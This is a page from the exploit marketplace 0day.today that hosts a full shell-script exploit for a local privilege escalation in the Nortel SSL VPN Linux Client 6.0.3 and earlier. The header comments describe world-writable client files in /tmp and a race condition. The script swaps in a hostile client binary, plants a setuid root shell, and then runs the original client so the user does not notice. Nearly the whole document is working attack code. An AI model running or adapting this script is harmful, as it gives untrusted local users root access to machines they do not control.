0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Nortel SSL VPN Linux Client <= 6.0.3 Local Privilege Escalation Exploit
======================================================================= Nortel SSL VPN Linux Client <= 6.0.3 Local Privilege Escalation Exploit ======================================================================= #!/bin/sh # # Nortel SSL VPN Linux Client race condition # # Jon Hart <jhart@spoofed.org> # # The Linux client that is utilized by versions priot to 6.05 of the Nortel # SSL VPN appliance suffers from a number of problems that, in combination, # allow an unprivileged local user to obtain root privileges. # # This particular bug is as follows: # 1) SSL VPN is initiated from the startNetdirect() javascript call # 2) A zip archive is downloaded to the local machine which contains three # binaries necessary for the client: askpass, client, and surun. This # archive is written to /tmp, chmod'd 777, and then it is extracted into # /tmp/NetClient # 3) All of these files are chmod'd world writable by the following java # snippet, which is called on all UNIX client OSs: # # protected boolean setPermissions(String file) # { # String command = "chmod a+xw " + file; # try # { # Process p = Runtime.getRuntime().exec(command); # p.waitFor(); # } # ... # } # # 4) /tmp/NetClient/surun is executed, which in turn runs # /tmp/NetClient/askpass. This process aquires the root password, and # then executes /tmp/NetClient/client via /bin/su and the root password. # # There is clearly a bug in step 2 and 3 whereby files are installed world # writable. The bug I chose to exploit is the race condition in step 4, # combined with the insecure permissions of steps 2 and 3, which (IMO), # gives root more easily. The risk here is if you have untrusted accounts # on the machine from which you access the Nortel VPN, those accounts can # easily gain local root access. # # The exploit is fairly simple. Wait for /tmp/NetClient/client to appear, # swap it for our "special version", and wait for a shell. # # Notes: a /tmp with nosuid will help mitigate this particular _exploit_, # but not the vulnerability. The same vulnerability also exists in the Mac # client. # # For education and testing purposes only. Only run this on systems that # you maintain/control. # cleanup() { rm -f $TMP_DIR/.*-$$\..* } run_cmd() { CMD=$@ VPN_CLIENT_RUN=`mktemp -t vpn_client_run-$$.XXXXXXXX` echo "Waiting for writable client" while (true); do if [ -w $CLIENT ]; then OLD_CLIENT=`mktemp -t old_client-$$.XXXXXXXXXX` echo "Saving old client" cp $CLIENT $OLD_CLIENT chmod 755 $OLD_CLIENT echo "Writing new \"client\"" echo "#!/bin/sh" > $CLIENT echo "$CMD" >> $CLIENT echo "rm -f $VPN_CLIENT_RUN" >> $CLIENT # ensure the original client gets run so as to # not alert the user echo "exec $OLD_CLIENT \$@" >> $CLIENT break fi done SUCCESS=0 echo "Waiting for new client to be run" while (true); do if [ ! -f $VPN_CLIENT_RUN ]; then SUCCESS=1 break else sleep 2 fi done if [ $SUCCESS == 1 ]; then echo "Success" return 0 else echo "Exploit failed!" cleanup exit 1 fi } suid_shell() { SH_C="sh_c-$$.c" # write out setuid shell cat >> $SH_C << EOF #include <sys/types.h> #include <unistd.h> int main (int argc, char **argv) { setuid(0); setgid(0); execl("/bin/bash", "bash", NULL); } EOF # try like hell to get this shell compiled SH=`mktemp -t vpnshell-$$.XXXXXXXXXX` gcc -o $SH $SH_C 2>&1 > /dev/null 2>&1 if [ $? != 0 ]; then cc -o $SH $SH_C 2>&1 > /dev/null 2>&1 if [ $? != 0 ]; then echo "Compilation of shell failed" echo "Trying backup method..." run_cmd "cp /bin/sh $SH && chmod 4755 $SH" while (true); do if [ -u $SH ]; then $SH cleanup exit else sleep 1 fi done echo "Failed" cleanup exit 1 fi fi rm -f $SH_C run_cmd "chown root:root $SH && chmod 4755 $SH" # wait for our shell to be chmod'd SUCCESS=0 echo "Waiting for suid shell" for sleep in `seq 1 60`; do if [ -u $SH ]; then echo "Success! setuid shell is $SH" SUCCESS=1 break else sleep 2 fi done if [ $SUCCESS == 1 ]; then cleanup $SH else rm -f $SH echo "Exploit failed!" cleanup exit 1 fi } CLIENT="/tmp/NetClient/client" if [ -f $CLIENT ]; then echo "client $CLIENT already exists -- forcing stop" $CLIENT --stop for sleep in `seq 1 60`; do if [ ! -f $CLIENT ]; then break fi sleep 1 done fi # hack to figure out where temp files get put... TMP_FILE=`mktemp -t $$` TMP_DIR=`dirname $TMP_FILE` rm -f $TMP_FILE trap cleanup 1 2 3 15 # two modes of operation -- get a root shell, or run a cmd as root. if [ -z "$1" ]; then suid_shell else run_cmd $1 fi cleanup # 0day.today [2024-12-24] #